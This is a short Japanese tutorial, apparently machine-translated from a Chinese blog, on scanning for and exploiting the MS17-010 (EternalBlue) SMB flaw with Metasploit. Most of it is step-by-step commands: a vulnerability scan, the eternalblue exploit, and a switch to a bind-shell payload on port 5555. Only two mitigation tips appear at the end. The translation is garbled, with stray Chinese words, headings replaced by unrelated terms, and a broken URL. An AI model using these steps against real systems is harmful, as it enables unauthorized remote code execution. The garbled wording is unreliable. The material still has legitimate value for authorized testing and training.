MS17-010(Eternal Blue)脆弱性の検出と悪用のチュートリアル


脆弱性の説明

  攻撃者は、特別に設計されたメッセージをMicrosoftサーバーメッセージブロックSMBサーバーに送信します。最も深刻な脆弱性により、リモートでコードが実行される可能性があります。

インパクトバージョン

  • Windows Vista
  • Windows 7
  • Windows 8.1
  • Windows RT 8.1
  • ウィンドウズ10
  • Windows Server 2008 和 Windows Server 2008 R2
  • Windows Server 2012 和 Windows Server 2012 R2
  • Windows Server2016

脆弱性の検出


時間

#启动msf
msfconsole

search ms17-010
use auxiliary/scanner/smb/smb_ms17_010

#设置目标ip
set rhosts 192.168.234.132

run

ヒントのHost is likely VULNERABLE to MS17-010脆弱性が存在する

ここに画像の説明を挿入

ウィンドウズ

ツールを使用する:https
//github.com/holmesian/ms17_010_scan

シングルIP検出:

#ms17010scan-h-n-amd64-1.exe -h ip
ms17010scan-h-n-amd64-1.exe -h 192.168.234.132

マルチIPスキャン:

#ms17010scan-h-n-amd64-1.exe -n ip/24
ms17010scan-h-n-amd64-1.exe -n 192.168.234.0/24

ここに画像の説明を挿入

エクスプロイト

時間:

#启动msf
msfconsole

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue

#设置目标ip
set rhosts 192.168.234.132

run

ここに画像の説明を挿入

パブリックネットワークのIPリバウンドシェルはありません

  PCしかなく、脆弱性から跳ね返ったシェルを受け入れるパブリックIPがない場合、msf攻撃ペイロードを変更するだけで済みます。

#查看攻击在和
show payloads 

ここに画像の説明を挿入

#修改攻击载荷为 generic/shell_bind_tcp
set payload 1

#查看配置,我们只需要设置
show options 
#设置目标ip
set rhost 192.168.234.134
set lport 5555

ここに画像の説明を挿入

run

ここに画像の説明を挿入

  私の理解では、generic / shell_bind_tcpペイロードは、ターゲットマシンのポート5555を開くことであり、シェルを取得するためにアクティブに接続します。

ここに画像の説明を挿入


  元のwindows / x64 / Meterpreter / reverse_tcpは、リッスンしているポートに相手をアクティブに接続させるためのものです。

ここに画像の説明を挿入


脆弱性の強化

1.オペレーティングシステムのパッチを更新します。
2.オペレーティングシステムの139や445などの冗長ポートをシャットダウンします。

おすすめ

転載: blog.csdn.net/weixin_41924764/article/details/109660938